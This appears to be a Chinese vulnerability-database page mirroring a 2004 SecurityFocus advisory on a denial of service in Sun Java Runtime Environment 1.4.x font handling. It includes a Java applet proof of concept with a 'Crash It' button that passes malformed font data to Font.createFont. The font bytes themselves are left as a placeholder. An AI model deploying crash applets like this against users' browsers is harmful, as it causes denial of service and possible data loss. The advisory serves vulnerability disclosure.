Sun Java Runtime Environment 1.4.x – Font Object Assertion Failure Denial of Service
漏洞ID | 1054506 | 漏洞类型 | |
发布时间 | 2004-06-28 | 更新时间 | 2004-06-28 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Multiple | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/10623/info
The Sun Java Runtime Environment Font object is reportedly vulnerable to an assertion failure denial of service vulnerability. This issue is due to a failure of the process to handle exceptional conditions when processing font objects.
This issue is reported to affect Java Runtime Environment versions 1.4.1 through 1.4.2; it is likely however that other versions are also affected. This issue will crash Internet browsers running an affected Java plug-in as well.
This issue may be exploited by an attacker to cause a vulnerable application, as well as all processes spawned from the application, to crash, denying service to legitimate users. Due to the scope of the crash, data loss may occur.
package org.illegalaccess.jvmcrash;
import java.util.*;
import java.applet.Applet;
import java.awt.color.*;
import java.awt.*;
import java.awt.event.*;
import java.io.*;
class BadData{public final static byte[] data = {some bytes};}
public class FontIPSClass extends Applet{
class MyButtonListener implements ActionListener {
public void actionPerformed(ActionEvent event) {
doit(new ByteArrayInputStream(BadData.data));
}
}
Hashtable files = new Hashtable();
TextArea ta ;
Button bu;
public FontIPSClass () throws Exception {
initme();
}
public static void main(String[] a) throws Exception {
//System.out.println(a0+testFileExistence(a0));
if (a.length > 0)
doit(new FileInputStream(a));
else
doit(new ByteArrayInputStream(BadData.data));
}
private void initme() {
ta = new TextArea ("",5, 40,
TextArea.SCROLLBARS_NONE);
add(ta);
bu = new Button("Crash It");
add(bu);
bu.setBackground(Color.orange);
bu.addActionListener(new MyButtonListener ());
}
private static void doit(InputStream in) {
try {
Font f = Font.createFont(Font.TRUETYPE_FONT,in);
System.out.println(f.getFamily());
System.out.println(f.getPSName());
System.out.println(f.getNumGlyphs());
}
catch (Exception e) {
e.printStackTrace();
}
}
}
相关推荐: nlog-smb NetBIOS Name Metacharacter Vulnerability
nlog-smb NetBIOS Name Metacharacter Vulnerability 漏洞ID 1104859 漏洞类型 Input Validation Error 发布时间 1998-12-26 更新时间 1998-12-26 CVE编号 N…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666